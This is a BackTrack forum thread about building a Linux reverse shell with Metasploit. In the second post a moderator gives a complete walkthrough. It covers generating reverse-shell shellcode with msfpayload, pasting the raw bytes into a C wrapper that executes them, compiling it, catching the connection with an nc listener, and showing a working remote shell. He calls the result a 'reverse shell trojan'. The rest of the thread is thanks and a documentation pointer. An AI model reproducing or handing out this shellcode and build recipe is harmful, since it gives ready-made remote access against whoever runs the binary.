Results 1 to 5 of 5

Thread: msfpayload/msfencode

Hybrid View

  1. #1
    Good friend of the forums spawn's Avatar
    Join Date
    Jan 2010
    Posts
    280

    Default msfpayload/msfencode

    hello there ,

    I tried follow ,

    msfpayload linux/x86/shell_reverse_tcp LPORT=53 R | msfencode -b '' -t elf -o shell

    but when I execute ./shell

    the follow message appears

    segmentation fault

    in -b param i tried too -b '\x00'
    what are wrong ?

    I tried in 32 and 64 bit architeture

    Thanks in advanced

  2. #2
    Super Moderator lupin's Avatar
    Join Date
    Jan 2010
    Posts
    2,943

    Default

    If your aim is to create a Linux reverse shell binary you can try the following

    Code:
    itsecurity@ptlaptop01:~$ /pentest/exploits/framework3/msfpayload linux/x86/shell_reverse_tcp LPORT=1050 LHOST=192.168.0.10 C
    /*
     * linux/x86/shell_reverse_tcp - 71 bytes
     * http://www.metasploit.com
     * LHOST=192.168.0.10, AppendExit=false,
     * PrependSetresuid=false, PrependSetuid=false, LPORT=1050,
     * PrependSetreuid=false
     */
    unsigned char buf[] =
    "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80"
    "\x5b\x5e\x68\xc0\xa8\x00\x0a\x66\x68\x04\x1a\x66\x53\x6a\x10"
    "\x51\x50\x89\xe1\x43\x6a\x66\x58\xcd\x80\x59\x87\xd9\xb0\x3f"
    "\xcd\x80\x49\x79\xf9\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
    "\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";
    Then take the C buffer and put it into a c program as follows

    Code:
    itsecurity@ptlaptop01:~$ cat revbind.c
    
    char code[] =
    "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80"
    "\x5b\x5e\x68\xc0\xa8\x00\x0a\x66\x68\x04\x1a\x66\x53\x6a\x10"
    "\x51\x50\x89\xe1\x43\x6a\x66\x58\xcd\x80\x59\x87\xd9\xb0\x3f"
    "\xcd\x80\x49\x79\xf9\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
    "\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";
    
    int main(int argc, char **argv)
    {
      int (*funct)();
      funct = (int (*)()) code;
      (int)(*funct)();
    }
    Compile:
    Code:
    itsecurity@ptlaptop01:~$ gcc revbind.c -o revbind
    Run listener on 192.168.0.10:
    Code:
    itsecurity@ptlaptop01:~$ nc -nvvlp 1050
    listening on [any] 1050 ...
    Run reverse shell trojan:
    Code:
    itsecurity@ptlaptop01:~$ ./revbind
    Go back to listener on 192.168.0.10 and try a few commands:
    Code:
    itsecurity@ptlaptop01:~$ nc -nvvlp 1050
    listening on [any] 1050 ...
    connect to [192.168.0.10] from (UNKNOWN) [192.168.0.10] 47665
    pwd
    /home/itsecurity
    hostname
    ptlaptop01
    Capitalisation is important. It's the difference between "Helping your brother Jack off a horse" and "Helping your brother jack off a horse".

    The Forum Rules, Forum FAQ and the BackTrack Wiki... learn them, love them, live them.

  3. #3
    Good friend of the forums spawn's Avatar
    Join Date
    Jan 2010
    Posts
    280

    Default

    I will go to try
    thanks Lupin ...
    Do you can indicate to me manuals or something that explain the msfencode and payload deep ?

    thanks in advanced

  4. #4
    Super Moderator lupin's Avatar
    Join Date
    Jan 2010
    Posts
    2,943

    Default

    Quote Originally Posted by spawn View Post
    Do you can indicate to me manuals or something that explain the msfencode and payload deep ?
    Theres some detail about them in the Metasploit Developer Guide, but whether its what you're after...
    Capitalisation is important. It's the difference between "Helping your brother Jack off a horse" and "Helping your brother jack off a horse".

    The Forum Rules, Forum FAQ and the BackTrack Wiki... learn them, love them, live them.

  5. #5
    Good friend of the forums spawn's Avatar
    Join Date
    Jan 2010
    Posts
    280

    Talking

    Again , thanks
    In metasploit unleashed I see one example too
    thanks
    I need to program
    it lacks me this


Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •